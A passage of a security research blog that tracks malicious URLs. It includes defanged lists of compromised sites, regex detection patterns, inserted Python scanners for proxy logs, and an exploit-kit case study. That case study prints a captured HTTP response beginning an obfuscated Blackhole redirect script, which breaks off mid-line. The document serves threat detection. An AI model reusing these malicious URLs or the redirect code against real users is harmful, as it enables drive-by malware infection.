<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://thekla-kampelmann.com/wlc.htm</td>
<td>83.125.114.225</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://theundergrounds.org/wlc.htm</td>
<td>188.93.237.135</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://tickets.econz.net/wlc.htm</td>
<td>173.0.137.215</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://top10.knoxvillebusiness.com/wlc.htm</td>
<td>69.163.133.96</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://trasken.com.br/wlc.htm</td>
<td>187.17.98.166</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://valleyironworksinc.com/wlc.htm</td>
<td>67.205.7.106</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://voltecs.unima.ru/wlc.htm</td>
<td>213.239.214.68</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://web.shu-bg.net/wlc.htm</td>
<td>194.141.47.8</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://wodteam.by/wlc.htm</td>
<td>80.249.84.134</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.bkpschool.ac.th/wlc.htm</td>
<td>119.59.120.12</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.brita-leth.dk/wlc.htm</td>
<td>193.202.110.80</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.caven.cn/wlc.htm</td>
<td>219.133.36.172</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.ccanw.co.uk/wlc.htm</td>
<td>79.170.44.112</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.cfbc.md/wlc.htm</td>
<td>93.116.255.220</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.contentoz.com/wlc.htm</td>
<td>134.0.10.214</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.crimestoppers-uk.org/wlc.htm</td>
<td>84.45.40.244</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.envirobuildings.com/wlc.htm</td>
<td>173.254.3.165</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.filmactingworkshops.com/wlc.htm</td>
<td>67.20.82.242</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.fizkult64.ru/wlc.htm</td>
<td>217.112.35.62</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.fonlider.rs/wlc.htm</td>
<td>212.200.146.137</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.ghostway.it/wlc.htm</td>
<td>46.137.96.65</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.globalcartrading.dk/wlc.htm</td>
<td>213.83.233.51</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.ibraco.org.co/wlc.htm</td>
<td>216.22.48.60</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.irklakojis.lt/wlc.htm</td>
<td>79.98.24.10</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.italianosrestaurant.net/wlc.htm</td>
<td>98.129.229.207</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.itoobras.cl/wlc.htm</td>
<td>69.163.151.29</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.ivcmf.by/wlc.htm</td>
<td>31.130.201.140</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.judiciary.go.ke/wlc.htm</td>
<td>31.222.163.18</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.karaczany.terrarium.pl/wlc.htm</td>
<td>87.98.235.213</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.knoxvillejukebox.com/wlc.htm</td>
<td>69.163.133.96</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.miel-baumanskaya.ru/wlc.htm</td>
<td>77.222.40.153</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.ndcotas.com.au/wlc.htm</td>
<td>69.163.229.122</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.playkrampage.com/wlc.htm</td>
<td>50.56.110.204</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.rascoly.com/wlc.htm</td>
<td>66.147.240.198</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.rovere.lu/wlc.htm</td>
<td>80.92.67.155</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.shadownessence.net/wlc.htm</td>
<td>195.74.38.18</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.suuberquiz.ch/wlc.htm</td>
<td>82.195.253.206</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.telemirspb.ru/wlc.htm</td>
<td>77.222.40.117</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.theundergrounds.org/wlc.htm</td>
<td>188.93.237.135</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.worldfund.org/wlc.htm</td>
<td>98.129.212.7</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.xrayinspectionservice.com/wlc.htm</td>
<td>184.106.55.35</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://zeo.designcon.tmweb.ru/wlc.htm</td>
<td>176.57.216.3</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://zone4.co.id/wlc.htm</td>
<td>103.4.175.114</td>
</tr>
</tbody></table>
<br />
<br />
<b>I've never visited Lithuania.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqF6mhkThSGbt3mizApuLKDfcXLASlAvypiH0Qaqb3KxqOKjSdjQ81-nTQr3mQbY5Z3EqwTAzp_Rt-5A_hrfz0zshQmMp6UKTb2OWN7FWi31sI9eZ9Uyqlm7RVh428femPF6h9HYtyI0c/s1600/latvia.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="406" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqF6mhkThSGbt3mizApuLKDfcXLASlAvypiH0Qaqb3KxqOKjSdjQ81-nTQr3mQbY5Z3EqwTAzp_Rt-5A_hrfz0zshQmMp6UKTb2OWN7FWi31sI9eZ9Uyqlm7RVh428femPF6h9HYtyI0c/s640/latvia.PNG" width="640" /></a></div>
<br />
References:<br />
URLQuery<br />
Cleanmx<br />
Generated intelligence<br />
<br />
<h2>
Data Dump - 115,000 suspicious URLs</h2>
Published 2013-01-15, updated 2013-02-21<br />
<br />
I recently discovered a published list of suspicious URLs containing over 115,000 links. This list came from a compromised box where the C drive was published online, accidentally.<br />
<br />
The list itself is a nice reference for patterns and use cases, including 7,000+ .exe files, PayPal phishing links, pastehtml.com links and all kinds of redirectors. Some of these are valid, some of them are taken down. Some of these are super malicious, some of them are unknown.<br />
<br />
<b>It should be stated that this list was grabbed from a repository of files on a compromised box which was accidentally published online. </b>Not every link is live, but all these links were in a directory referenced by malware samples of a likely TDS infection.<br />
<br />
I have gone through many of them, but I decided to publish the entire list.<br />
<br />
Sharing is caring.<br />
<br />
<a href="http://www.fortknoxnetworks.com/intel/dumps/urls.zip">FULL URL LIST</a><br />
<br />
<a href="http://www.fortknoxnetworks.com/intel/dump/exes.txt">EXEs ONLY</a><br />
<br />
Screencap of dump file, available at links above.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiytTMflGmyR0J8LZ67GYleyhROaFTwAlHCg9NSX3MSC4ndICrp_zTxVZn9eRdXjJVZWMcSpwo2efQdeaDGatfAEhrCf5KeO9Bq597pWjh3AcNQDtBpWm4LO7OyPIAOBNYUQ07WAWES0Wk/s1600/screencap.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiytTMflGmyR0J8LZ67GYleyhROaFTwAlHCg9NSX3MSC4ndICrp_zTxVZn9eRdXjJVZWMcSpwo2efQdeaDGatfAEhrCf5KeO9Bq597pWjh3AcNQDtBpWm4LO7OyPIAOBNYUQ07WAWES0Wk/s1600/screencap.PNG" /></a></div>
<br />
<h2>
Parenthesis URL Pattern, Likely Associated with Badness</h2>
Published 2012-12-30<br />
<br />
<span style="font-family: inherit;">I ran into an interesting URL pattern containing parentheses in a specific method. On deeper inspection, it looks like this pattern may be associated with badness, the details of which I am not certain but thought good enough to bring to the community. </span><br />
<br />
<br />
My research on this so far indicates that some of the URLs are associated with known Zeus/SpyEye C2 servers, and a large number of these patterns are hosted on legitimate sites whose subdirectories containing these patterns are not indexed by Google. Also, it appears this pattern has been active for some time and may have been identified by other researchers; I am not sure.<br />
<br />
Some URLquery patterns show redirects to a domain that was reported in December as associated with drive-by downloads in an Android forum which is no longer operational (at least today).<br />
<br />
The observations at this time are that these are redirects, or contain redirects, to badness which is why I am bringing it to the community.<br />
<br />
<span style="background-color: white; color: #222222; font-size: x-small; line-height: 16px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTX6WcD1o9pEuqJpAfTtPL_vL0k3ua3hPRrspfmlTAZMx0-5NTsHERDYXOpeulBhMMWXAVOjQuZEsI1hMzdApfyV0BSNBxFdS5TiVJr3e8ikSHajAPwEwVBpC_IZCsgBJ0UQJ5Z5G8QPc/s1600/ritastexas.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTX6WcD1o9pEuqJpAfTtPL_vL0k3ua3hPRrspfmlTAZMx0-5NTsHERDYXOpeulBhMMWXAVOjQuZEsI1hMzdApfyV0BSNBxFdS5TiVJr3e8ikSHajAPwEwVBpC_IZCsgBJ0UQJ5Z5G8QPc/s1600/ritastexas.PNG" /></a></div>
<span style="background-color: white; color: #222222; font-size: x-small; line-height: 16px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="background-color: white; color: #222222; font-size: x-small; line-height: 16px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: x-small; line-height: 16px;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEt9slfbCsK87uxVjtFvLGh9tQgbfVm5oqA6dddIh046uurA3vBUzcpVHO7rvX3wshsGKzieBRDGa7LeCGpxAusl1TE97DFXgdGCDUPf3VLIgqt3X_S4sDvjb_daCqUevnGOrrfrHHKiA/s1600/examplesofaspx.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEt9slfbCsK87uxVjtFvLGh9tQgbfVm5oqA6dddIh046uurA3vBUzcpVHO7rvX3wshsGKzieBRDGa7LeCGpxAusl1TE97DFXgdGCDUPf3VLIgqt3X_S4sDvjb_daCqUevnGOrrfrHHKiA/s320/examplesofaspx.PNG" width="320" /></a></div>
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: x-small; line-height: 16px;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEOsXMgptSaDDyF_qw3Q1BrUaUtjhLUXh3g3-stFcqCeFaXVJfttm-mXrnaDVMdIU3e3rfcmec9D4s1cpkEch_NL_cb4Hf4dS1R4sQBDf_Llm30xRfnBmB_A2fgLdN3bz3GlLq_Sz2TNo/s1600/legit+sites.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEOsXMgptSaDDyF_qw3Q1BrUaUtjhLUXh3g3-stFcqCeFaXVJfttm-mXrnaDVMdIU3e3rfcmec9D4s1cpkEch_NL_cb4Hf4dS1R4sQBDf_Llm30xRfnBmB_A2fgLdN3bz3GlLq_Sz2TNo/s320/legit+sites.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
The URL pattern in question is:</div>
<div class="separator" style="clear: both;">
<span style="color: red;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="color: red;"><b>\(s\(\w{24}\)\)?\/\w{2,}\.aspx</b></span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
There is one URLquery report on this type of URL here. On inspection, this report shows a series of GET requests including one URL which traces back to a report on undroid.us as containing badness (hxxp://zirycatum.com/k985ytv.htm). I also noticed the k985ytv.htm more than once.</div>
<div class="separator" style="clear: both;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjivb1u3lj4N6UZBuhNarcd406AZZXAI1yCvWnrTzPxXc9j8Dmi2sbhBdf6Nqabq0IYgFHrmAa4lsWnyjUqA7MN_lgscgc6PBgAbzRSoOmrir0_Z-pYKhx81sxTnqL_1OmLJ5Gr2YreGFI/s1600/aspxredirect.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjivb1u3lj4N6UZBuhNarcd406AZZXAI1yCvWnrTzPxXc9j8Dmi2sbhBdf6Nqabq0IYgFHrmAa4lsWnyjUqA7MN_lgscgc6PBgAbzRSoOmrir0_Z-pYKhx81sxTnqL_1OmLJ5Gr2YreGFI/s640/aspxredirect.PNG" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
And I'm not alone in looking at this, going back a while now.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHtflnqjJwqWnZN9gsEGYJbUQVuxRTwypYlI5jFMZCM-QP4-CjLBNFgvDyp9cMlBz5GcOdHKbE9LuBs0osk_F50B0xTflqX5g1bwu6T1wq56uPhLrIKcLrAEIeWqEBqsgf5R2xSjgtpuI/s1600/k985ytv.htm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHtflnqjJwqWnZN9gsEGYJbUQVuxRTwypYlI5jFMZCM-QP4-CjLBNFgvDyp9cMlBz5GcOdHKbE9LuBs0osk_F50B0xTflqX5g1bwu6T1wq56uPhLrIKcLrAEIeWqEBqsgf5R2xSjgtpuI/s640/k985ytv.htm.png" width="614" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
AVG did recognize the content.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCrvErPPBsVw7KYy9IhcBevFylF-PWG_b9LtGL50mas0i8ZAHn8BXoKlvVhpRGHm2c1KMTNIrVsoYjmm-EJVnA1uN03wuMZeluL-zKPyZ1fykBOi1H9fLRmY06b8S5PhLfBtsTEp1svQE/s1600/htmlframer.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCrvErPPBsVw7KYy9IhcBevFylF-PWG_b9LtGL50mas0i8ZAHn8BXoKlvVhpRGHm2c1KMTNIrVsoYjmm-EJVnA1uN03wuMZeluL-zKPyZ1fykBOi1H9fLRmY06b8S5PhLfBtsTEp1svQE/s320/htmlframer.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Jsunpack </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6T2nmRfplS79XVFTLmbzwSAPShvWPobCEHz_tLHrx8P1UduraY8CFYSPOjJjmGMS81HCp2FQ9cB2d27D4CZeuNecTH_f3RrKkeFnXrU_2BtuiJwFD-mvwleN7Az7udmdXzpTZi8IHYF8/s1600/redirect.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6T2nmRfplS79XVFTLmbzwSAPShvWPobCEHz_tLHrx8P1UduraY8CFYSPOjJjmGMS81HCp2FQ9cB2d27D4CZeuNecTH_f3RrKkeFnXrU_2BtuiJwFD-mvwleN7Az7udmdXzpTZi8IHYF8/s320/redirect.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
www.undroid.us/wordpress/?cat=19<br />
Dec 8, 2012 - 2. zirycatum.com (ex: hxxp://zirycatum.com/k985ytv.htm) 3. numudozaf.com (ex: hxxp://numudozaf.com/k985ytv.htm) Above all resolve to the same Moldova (south ...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrogkNUuH8bj1yGd2422jBppr-45h4zLlL-86s7Yv8z8jICKwxlajA4QXHNPBqhv8yHZE8Q3Hoi60dONc6kV-s3gZgHc_xKUimGW4kho0hCahiklGVJ82l_z4FjLpdXi12ALV3GzWS1HQ/s1600/moldova.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrogkNUuH8bj1yGd2422jBppr-45h4zLlL-86s7Yv8z8jICKwxlajA4QXHNPBqhv8yHZE8Q3Hoi60dONc6kV-s3gZgHc_xKUimGW4kho0hCahiklGVJ82l_z4FjLpdXi12ALV3GzWS1HQ/s400/moldova.PNG" width="400" /></a></div>
<h3>
<br /></h3>
<br />
Any feedback or further info, hit me up @fknsec<br />
<br />
I have not researched if any IDS (Snort) sigs match this pattern.<br />
<br />
HAPPY NEW YEAR<br />
<br />
<br />
<br />
<br />
<br />
References:<br />
http://urlquery.net/report.php?id=14666<br />
www.undroid.us/wordpress/?cat=19<br />
http://jsunpack.jeek.org/?report=fc505de91ae02e6ed905bb22746975e5d4d70c93<br />
http://forums.cnet.com/7726-6132_102-3375245.html<br />
<br />
<h2>
Unrecognized URL Pattern Involving Malware Binaries</h2>
Published 2012-12-16<br />
<br />
In the interests of keeping FPs to a minimum, I'm including the mooo.com, but pull it out if you want to test your site for FPs. This appears to be designed to deliver malware binaries and at this point I do not have anything further to share. I would keep an eye out for this one and feed back any info please @fknsec #teamwork. <br />
<br />
<br />
<div style="text-align: center;">
<u><b>Pattern type 1</b></u><br />
</div>
<div style="text-align: center;">
<b>mooo\.com\/\w{2,8}\d{3}\_\d{4}\.php\?\w{4,10}\=</b></div>
<div style="text-align: center;">
<br />
<u><b>Pattern type 2 (appears to be only binaries)</b></u></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>mooo\.com\/\?\w{2,9}\=[a-zA-Z0-9]{16,}</b></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<b>Pattern type 1 examples:</b><br />
<br />
<br />
<br />
<br />
Pattern Type 2: Binary<a href="http://www.zerovulnerabilitylabs.com/home/services/security-intelligence/"> (as per Exploit Shield)</a><br />
<br />
<br />
<b><br /></b>
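The parenthesis .aspx pattern from the previous post and the two mooo.com patterns from this one, applied to a URL list. This is an added example, not code from the original posts: the function names, the case-insensitive flag, the widened type 2 variant and every sample URL are assumptions or constructed values. The parenthesis shape is also what ASP.NET emits when cookieless session state is enabled, so a constructed intranet URL is included to show that a hit needs the redirect context described in the post before it is treated as malicious.

```python
import re

# The three patterns from the posts, transcribed to Python (no "\/" needed,
# dots escaped). Assumption: case-insensitive matching; the posts do not say.
PAGE_PATTERNS = {
    "paren-aspx": re.compile(r"\(s\(\w{24}\)\)?/\w{2,}\.aspx", re.I),
    "mooo-type1": re.compile(r"mooo\.com/\w{2,8}\d{3}_\d{4}\.php\?\w{4,10}=", re.I),
    "mooo-type2": re.compile(r"mooo\.com/\?\w{2,9}=[a-zA-Z0-9]{16,}", re.I),
}

# Added variant (an assumption, not from the post): also accept "+", "/" and
# "%" so base64-style values and their percent-escaped forms still match.
WIDENED_TYPE2 = re.compile(r"mooo\.com/\?\w{2,9}=[A-Za-z0-9+/%]{16,}", re.I)

# Constructed sample URLs (not taken from the posts), defanged where they
# imitate the hostile shape.
SAMPLE_URLS = [
    "hxxp://www2.aaaa1111bbbb.mooo.com/abcde106_5613.php?8abc=QUJDREVGRw",
    "hxxp://www2.cccc2222dddd.mooo.com/?key1abc=QUJDREVGR0hJSktMTU5PUA",
    "hxxp://www2.cccc2222dddd.mooo.com/?key2abcd=l8%2FQUJDREVGR0hJSktMTU5P",
    "http://intranet.example/(S(abcdefghijklmnopqrstuvwx))/Default.aspx",
    "http://www.example.com/index.aspx",
]


def classify(url):
    """Return the sorted names of the published patterns that match this URL."""
    return sorted(name for name, rx in PAGE_PATTERNS.items() if rx.search(url))


def scan(urls):
    """Map each URL with at least one hit to its list of pattern names."""
    hits = {}
    for url in urls:
        names = classify(url)
        if names:
            hits[url] = names
    return hits


def type2_gap(urls):
    """URLs the widened variant catches but the published type 2 pattern misses."""
    page_rx = PAGE_PATTERNS["mooo-type2"]
    return [u for u in urls
            if WIDENED_TYPE2.search(u) and not page_rx.search(u)]


if __name__ == "__main__":
    for url, names in scan(SAMPLE_URLS).items():
        print(f"{', '.join(names):12} {url}")
    for url in type2_gap(SAMPLE_URLS):
        print(f"missed by published type 2: {url}")
```
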
<br />
<h2>
Case Study: Exploiting Weakness To Quietly Exfiltrate Data</h2>
Published 2012-12-07<br />
<br />
<span style="font-family: inherit;">As per Emergingthreats, this is the </span><span style="background-color: whitesmoke; color: #333333; font-family: Arial, sans-serif; font-size: 13.63636302947998px; line-height: 17.999998092651367px;">Glazunov exploit kit.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">This particular case is an excellent example to demonstrate that malware authors do their best to avoid detection and do not play by the internet rules. The utilization of defense in depth is a critical component to any information security program and would assist in limiting the damage from an attack of this nature.</span><br />
<span style="font-family: inherit;"><br /></span>
This example shows:<br />
<ul>
<li>A compromised site/malicious site which is, for the most part, unrecognized.</li>
<li>A redirect to HTTP TCP port 8080 direct to IP.</li>
<li>Content delivery which appears innocuous in URL logs.</li>
<li>Java exploits which are not detected by virtually any AV.</li>
<li>Malware which is not detected.</li>
<li>Exfiltration of data on high ports showing as only TCP connections.</li>
<li>Utilizing other people's IP addresses as drop points.</li>
</ul>
<br />
<h3>
<span style="font-family: inherit;">This was achieved because of the following gaps in security:</span></h3>
<br />
<ul>
<li>Endpoint did not have updated Java version and was vulnerable</li>
<li>Web filtering did not block direct to IP requests</li>
<li>Layer 7 filtering was not performed at the perimeter (IPS) for the exploit code.</li>
<li>AV did not detect the malware</li>
<li>Outbound ports were not restricted. The endpoint could communicate outbound.</li>
</ul>
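One way to review proxy logs for two of the gaps listed above (direct-to-IP requests and unrestricted outbound ports), as an added example that is not from the original post. The log format, function names and internal-range list are assumptions, and the log lines are constructed with documentation addresses.

```python
import ipaddress
from urllib.parse import urlsplit

STANDARD_PORTS = {"http": 80, "https": 443}

# Internal ranges that are legitimately addressed by IP (assumed policy choice).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed proxy log: timestamp, client, method, URL, status.
# Destination addresses are documentation ranges, not addresses from the post.
SAMPLE_LOG = [
    "2012-11-27T00:10:10Z 10.1.2.3 GET http://www.example.com/2009/01/post/ 200",
    "2012-11-27T00:10:14Z 10.1.2.3 GET http://203.0.113.7:8080/1234567890/12345 200",
    "2012-11-27T00:10:15Z 10.1.2.3 GET http://192.168.10.5/intranet/status 200",
    "2012-11-27T00:10:16Z 10.1.2.3 GET http://198.51.100.20/favicon.ico 404",
    "2012-11-27T00:10:17Z 10.1.2.3 GET http://cdn.example.net:8080/app.js 200",
    "2012-11-27T00:10:18Z 10.1.2.3 truncated-entry",
]


def review_request(url):
    """Return the policy reasons a web filter would flag this URL for."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return ["unparseable-url"]
    host = parts.hostname
    if not host or parts.scheme not in STANDARD_PORTS:
        return []
    reasons = []
    try:
        ip = ipaddress.ip_address(host)  # accepts IPv4 and IPv6 literals
    except ValueError:
        ip = None  # host is a name, not an address
    if ip is not None and not any(ip in net for net in INTERNAL_NETS):
        reasons.append("direct-to-ip")
    try:
        port = parts.port
    except ValueError:
        return reasons + ["invalid-port"]
    if port is not None and port != STANDARD_PORTS[parts.scheme]:
        reasons.append("non-standard-port")
    return reasons


def flag_log(lines):
    """Return (client, url, reasons) for every log entry with a finding."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed entries rather than guessing at fields
        _ts, client, _method, url, _status = fields
        reasons = review_request(url)
        if reasons:
            findings.append((client, url, reasons))
    return findings


if __name__ == "__main__":
    for client, url, reasons in flag_log(SAMPLE_LOG):
        print(f"{client} -> {url}: {', '.join(reasons)}")
```
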
<br />
<span style="font-family: inherit;"><br /></span>
<br />
<pre style="font-size: 13px;"></pre>
<pre><pre style="font-size: 13px;"><b><span style="font-family: inherit;">The entry point is a 301 redirect; however, </span></b><b><span style="font-family: inherit;">the content length is a28 and there is what AVG recognizes as a Blackhole redirect in the 301 response. </span></b></pre>
<pre><span style="font-family: inherit;">hxxp://www.helloooooo.com/2009/01/splinter-impostor-claims-worlds-longest-hair/</span></pre>
<span style="font-size: xx-small;">This is a dangerous website and should not be visited in a browser.</span>
<pre></pre>
<pre><span style="font-family: Courier New, monospace;">
</span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCt7s4l7a8QesDjbQZO5YnUmjXaIMj1-gHXGK6AHZEcKs6HBtyTybxRBTMO88ozg-irMlVEdfxjANIMyFT9MqySg242QxAMr6uTClawKrL1pGS9SRA6pnW8VbA6p8H5aU7BrJIdBhOZm8/s1600/helllo.com+entry+point.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="484" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCt7s4l7a8QesDjbQZO5YnUmjXaIMj1-gHXGK6AHZEcKs6HBtyTybxRBTMO88ozg-irMlVEdfxjANIMyFT9MqySg242QxAMr6uTClawKrL1pGS9SRA6pnW8VbA6p8H5aU7BrJIdBhOZm8/s640/helllo.com+entry+point.png" width="640" /></a></div>
<pre style="font-family: 'Courier New', monospace; font-size: 13px;"></pre>
<pre style="font-family: 'Courier New', monospace; font-size: 13px;"><b>The next step is for me to get the redirect URL.</b></pre>
<pre><span style="font-family: Courier New, monospace;">
</span></pre>
<pre><span style="font-family: Courier New, monospace;"><span style="color: red;">GET /2009/01/splinter-impostor-claims-worlds-longest-hair/ HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.helloooooo.com
Connection: Keep-Alive</span>
</span><span style="font-family: 'Courier New', monospace; font-size: 13px;">
</span></pre>
<pre><span style="font-family: 'Courier New', monospace; font-size: 13px;"><b>And gives me a gift... to quote my friend Tarun.</b></span></pre>
<pre><span style="color: red; font-family: Courier New, monospace;">HTTP/1.1 200 OK
Date: Tue, 27 Nov 2012 00:10:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Pingback: http://www.helloooooo.com/xmlrpc.php
Link: <http://www.helloooooo.com/?p=1892>; rel=shortlink
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
5244
<script>if(window.document)try{new location(12);}catch(qqq){aa=[]+0;aaa=0+[];</span></pre>
